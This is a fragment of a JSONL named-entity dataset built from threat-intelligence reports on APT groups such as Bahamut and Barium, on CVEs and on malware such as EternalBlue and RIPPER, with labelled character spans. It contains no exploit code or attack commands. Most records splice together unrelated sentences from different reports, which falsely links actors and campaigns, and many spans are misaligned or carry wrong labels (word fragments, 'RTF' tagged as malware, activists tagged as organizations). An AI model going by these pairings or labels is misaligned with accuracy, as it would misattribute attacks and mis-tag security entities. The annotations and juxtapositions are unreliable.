Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": [{"start": 11, "end": 25, "label": "Vulnerability"}, {"start": 95, "end": 108, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 194, "end": 222, "label": "Vulnerability"}]} {"text": "In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 80, "end": 93, "label": "Vulnerability"}]} {"text": "Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": [{"start": 74, "end": 87, "label": "Vulnerability"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 293, "end": 304, "label": "System"}, {"start": 305, "end": 312, "label": "Vulnerability"}, {"start": 331, "end": 341, "label": "Organization"}]} {"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . 
However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system could still be compromised .", "spans": [{"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 118, "end": 131, "label": "Vulnerability"}, {"start": 351, "end": 356, "label": "Organization"}, {"start": 365, "end": 373, "label": "Vulnerability"}]} {"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": [{"start": 31, "end": 53, "label": "Vulnerability"}, {"start": 84, "end": 92, "label": "Organization"}, {"start": 299, "end": 317, "label": "Organization"}]} {"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 45, "label": "Vulnerability"}, {"start": 164, "end": 200, "label": "Organization"}]} {"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . 
Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 211, "end": 225, "label": "Organization"}, {"start": 315, "end": 340, "label": "Organization"}, {"start": 346, "end": 356, "label": "Organization"}]} {"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": [{"start": 14, "end": 27, "label": "Vulnerability"}, {"start": 70, "end": 83, "label": "Vulnerability"}, {"start": 156, "end": 163, "label": "Organization"}]} {"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": [{"start": 54, "end": 68, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 182, "end": 209, "label": "Malware"}]} {"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . 
Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": [{"start": 49, "end": 57, "label": "Organization"}, {"start": 58, "end": 73, "label": "Vulnerability"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 215, "end": 222, "label": "System"}, {"start": 223, "end": 230, "label": "Malware"}]} {"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 221, "end": 228, "label": "Organization"}]} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}, {"start": 76, "end": 80, "label": "Organization"}, {"start": 94, "end": 107, "label": "Organization"}, {"start": 112, "end": 121, "label": "Organization"}]} {"text": "At this time , we do not believe that the attackers found a new ASA exploit . 
However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": [{"start": 15, "end": 17, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 64, "end": 67, "label": "Vulnerability"}, {"start": 68, "end": 75, "label": "Vulnerability"}]} {"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}]} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}]} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . 
In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 195, "end": 202, "label": "Malware"}, {"start": 251, "end": 279, "label": "Malware"}]} {"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 297, "end": 302, "label": "Malware"}]} {"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 170, "end": 185, "label": "Organization"}, {"start": 188, "end": 191, "label": "Organization"}]} {"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . 
As a result , it is already flagged as Bahamut by antivirus engines .", "spans": [{"start": 28, "end": 42, "label": "Vulnerability"}, {"start": 47, "end": 60, "label": "Vulnerability"}, {"start": 67, "end": 77, "label": "System"}, {"start": 126, "end": 132, "label": "Organization"}]} {"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": [{"start": 90, "end": 103, "label": "Organization"}, {"start": 122, "end": 135, "label": "Vulnerability"}, {"start": 145, "end": 159, "label": "System"}, {"start": 321, "end": 339, "label": "Organization"}]} {"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": [{"start": 37, "end": 50, "label": "Organization"}, {"start": 103, "end": 116, "label": "Vulnerability"}, {"start": 402, "end": 421, "label": "Malware"}]} {"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . 
Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}]} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" Flash text \" . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 389, "end": 394, "label": "System"}, {"start": 550, "end": 555, "label": "System"}]} {"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 54, "end": 67, "label": "Vulnerability"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}]} {"text": "specifically CVE-2018-0798 , before downloading subsequent payloads . 
Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud .", "spans": [{"start": 13, "end": 26, "label": "Vulnerability"}, {"start": 81, "end": 88, "label": "Organization"}]} {"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions \u2013 South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}]} {"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 52, "end": 59, "label": "Vulnerability"}, {"start": 69, "end": 82, "label": "Vulnerability"}, {"start": 294, "end": 301, "label": "System"}, {"start": 302, "end": 309, "label": "Malware"}]} {"text": "We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . 
Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 134, "end": 148, "label": "Vulnerability"}, {"start": 151, "end": 158, "label": "Organization"}]} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 324, "end": 339, "label": "Indicator"}, {"start": 355, "end": 365, "label": "System"}, {"start": 377, "end": 407, "label": "Indicator"}]} {"text": "The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . The China-backed Barium APT is suspected to be at the helm of the project .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 43, "label": "Vulnerability"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 208, "end": 224, "label": "Vulnerability"}, {"start": 225, "end": 232, "label": "Vulnerability"}, {"start": 252, "end": 258, "label": "Organization"}]} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . 
Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers \u2013 which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 501, "end": 514, "label": "Organization"}]} {"text": "Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 140, "end": 154, "label": "Vulnerability"}, {"start": 166, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 224, "end": 237, "label": "Organization"}]} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Organization"}, {"start": 191, "end": 197, "label": "Organization"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 180, "end": 183, "label": "Organization"}, {"start": 215, "end": 224, "label": "Malware"}, {"start": 229, "end": 237, "label": "Malware"}, {"start": 297, "end": 313, "label": "Malware"}]} {"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . That said , the \" fingerprints \" left on the samples by the attackers \u2013 including techniques used to achieve unauthorized code execution \u2013 suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": [{"start": 65, "end": 72, "label": "Vulnerability"}, {"start": 81, "end": 109, "label": "Vulnerability"}, {"start": 268, "end": 278, "label": "Organization"}]} {"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . 
In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 165, "end": 200, "label": "Organization"}]} {"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": [{"start": 11, "end": 25, "label": "Organization"}, {"start": 55, "end": 68, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 271, "end": 287, "label": "Malware"}, {"start": 412, "end": 430, "label": "Malware"}]} {"text": "Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}]} {"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . 
Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions of other Gulf states , Bahamut 's interests are seemingly too expansive to be limited to one sponsor or customer .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 10, "end": 19, "label": "System"}, {"start": 22, "end": 30, "label": "System"}, {"start": 33, "end": 47, "label": "System"}, {"start": 50, "end": 56, "label": "System"}, {"start": 61, "end": 77, "label": "System"}, {"start": 98, "end": 119, "label": "Malware"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 273, "end": 300, "label": "Organization"}]} {"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trick those employees into compromising their computers and networks .", "spans": [{"start": 53, "end": 65, "label": "Organization"}, {"start": 81, "end": 89, "label": "System"}, {"start": 95, "end": 112, "label": "Malware"}, {"start": 115, "end": 121, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 386, "end": 395, "label": "Organization"}]} {"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . 
We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": [{"start": 7, "end": 25, "label": "System"}, {"start": 42, "end": 54, "label": "Organization"}, {"start": 64, "end": 85, "label": "Malware"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 243, "end": 262, "label": "Indicator"}, {"start": 298, "end": 300, "label": "System"}]} {"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . Although the Barium Defendants have relied on different and distinct infrastructures in an effort to evade detection , Barium used the same e-mail address ( hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers .", "spans": [{"start": 52, "end": 68, "label": "Malware"}, {"start": 71, "end": 81, "label": "Malware"}, {"start": 86, "end": 97, "label": "Malware"}, {"start": 100, "end": 127, "label": "Malware"}, {"start": 134, "end": 162, "label": "Malware"}, {"start": 300, "end": 306, "label": "System"}, {"start": 317, "end": 335, "label": "Indicator"}, {"start": 419, "end": 425, "label": "Organization"}]} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 153, "end": 162, "label": "Malware"}, {"start": 185, "end": 191, "label": "Organization"}, {"start": 226, "end": 255, "label": "Organization"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background information from social media sites .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 236, "end": 242, "label": "Organization"}, {"start": 294, "end": 306, "label": "Organization"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within Human Resources or Business Development departments of the targeted organizations in order to compromise the computers of such individuals .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 251, "end": 257, "label": "Organization"}]} {"text": "Upon execution , it will communicate with an attacker-controlled website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . 
The first method , described in Part D.1 , below , involves the \" Barlaiy \" and \" PlugX.L \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 230, "end": 237, "label": "Malware"}, {"start": 246, "end": 252, "label": "Malware"}, {"start": 275, "end": 281, "label": "Organization"}]} {"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as if it were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 198, "end": 210, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 279, "end": 285, "label": "System"}, {"start": 339, "end": 345, "label": "System"}]} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . 
Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 229, "end": 242, "label": "Malware"}]} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information from a victim 's device .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 137, "end": 150, "label": "Malware"}, {"start": 153, "end": 166, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}]} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 135, "end": 141, "label": "Organization"}, {"start": 225, "end": 244, "label": "Malware"}]} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . 
While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 251, "end": 257, "label": "Organization"}, {"start": 296, "end": 313, "label": "Indicator"}]} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}, {"start": 220, "end": 230, "label": "Indicator"}, {"start": 360, "end": 377, "label": "Indicator"}]} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 220, "end": 226, "label": "Organization"}]} {"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . 
Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 48, "end": 51, "label": "Organization"}, {"start": 112, "end": 151, "label": "Malware"}, {"start": 168, "end": 200, "label": "Malware"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 223, "end": 242, "label": "Organization"}]} {"text": "Some hackers even went on to use the Cisco exploits in the wild . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , Exfiltration of intellectual property regarding technology has been seen ) , and personal information from the victim 's network .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 74, "end": 80, "label": "Organization"}, {"start": 319, "end": 329, "label": "Organization"}]} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 291, "end": 306, "label": "Organization"}]} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 45, "end": 64, "label": "Malware"}, {"start": 67, "end": 79, "label": "Malware"}, {"start": 84, "end": 119, "label": "Malware"}, {"start": 250, "end": 254, "label": "Organization"}, {"start": 257, "end": 263, "label": "Organization"}, {"start": 266, "end": 278, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}, {"start": 309, "end": 315, "label": "Organization"}]} {"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 27, "end": 39, "label": "System"}, {"start": 61, "end": 79, "label": "Malware"}, {"start": 84, "end": 112, "label": "Malware"}, {"start": 202, "end": 224, "label": "Organization"}, {"start": 229, "end": 247, "label": "Organization"}, {"start": 258, "end": 284, "label": "Organization"}]} {"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . 
In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": [{"start": 79, "end": 96, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 172, "end": 184, "label": "System"}, {"start": 213, "end": 246, "label": "Malware"}, {"start": 373, "end": 388, "label": "Malware"}]} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Blackgear has been targeting various industries since its emergence a decade ago .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}]} {"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency \u2013 NSA 's hacking tools and tactics . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateway .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 117, "end": 120, "label": "Organization"}]} {"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . 
BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 3, "end": 23, "label": "Malware"}, {"start": 121, "end": 146, "label": "Malware"}, {"start": 151, "end": 173, "label": "Malware"}, {"start": 230, "end": 235, "label": "Organization"}]} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 304, "end": 318, "label": "Organization"}]} {"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 252, "end": 259, "label": "Malware"}, {"start": 